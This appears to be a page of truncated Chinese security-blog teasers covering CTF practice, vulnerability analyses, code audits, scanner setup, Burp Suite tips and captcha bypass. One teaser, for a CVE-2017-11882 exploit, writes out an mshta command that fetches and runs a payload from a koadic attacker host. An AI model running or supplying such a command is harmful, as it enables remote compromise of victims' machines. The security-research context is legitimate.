当前仓库搜集了 570 多个 Linux 命令，是一个非盈利性的仓库，生成了一个 web 网站方便使用，目前网站没有任何广告，内容包含 Linux 命令手册、详解、学习，内容来自网络和网友的补充，非常值得...

我们先准备一张PNG图片，在PS里调整下大小和透明度，使用下面脚本可以把PNG图叠加到一张JPG图上，然后保存图片查看水印是否合适。# JPG叠加PNG透明图片 from PIL import Image, ImageDraw, Imag...

渗透基础的最后六道题，，但是难度反而有点下降~可能这时候题目要讲究一个宽度吧~ 11.我和上题有点像 同样是文件下载漏洞，直接抓包查看参数即可~ 我们来修改pic参数，这里为了示意，直接构造...

前言 10月13号X41 D-Sec组织披露了有关Shadowsocks的一些漏洞，文章在此。以下对文中提及的日志文件写入和命令执行漏洞进行简要分析。 漏洞细节还是很简单的，但其中涉及到了一些小技巧还是可以...

近期一直想搭建一个自己的漏扫平台，同时锻炼下自己的poc编写水平，，不过还是借助一个平台吧~ 这里采用的是YSRC的巡风扫描系统，界面非常好，不过插件就有点坑了。。 下面来详细介绍一下搭建过...

这次审计因为对thinkphp框架的不熟悉，中间走了很多弯路，有些tp框架的特定函数不是太了解，因此看代码看的十分吃力，其实上午就已经审计了一套代码，但是没有找到漏洞。。很气。。 源码下载地...

前言：由于漏洞重复了，因此提前公布漏洞详情，挖的几个漏洞都是高危漏洞，后台没有看，同时存在一个后台登录的cookie绕过，这里可看前面文章：代码审计之Semcms v2.3。 一、cms简介 SemCms是一...

项目地址：https://github.com/iBearcat/CVE-2017-11882 首先开启koadic，然后配置一下 复制这句代码 mshta http://192.168.220.132:9999/dHem0 ...

* 本文作者：shadow4u，本文属FreeBuf原创奖励计划，未经许可禁止转载 一年一度的Burpsuite过期的时间又到了，Burpsuite作为Web安全者必不可少的一件神器，其实有很多实用的技巧，本篇文章的目...

作者：野火研习社·fakl 本文主要讲解在漏洞挖掘过程中绕过验证码的一些小技巧，偏向于实战。验证码可被绕过本身就是一个漏洞，但很多厂家并不是很重视这个问题，给的奖励也很少，因此我更喜欢...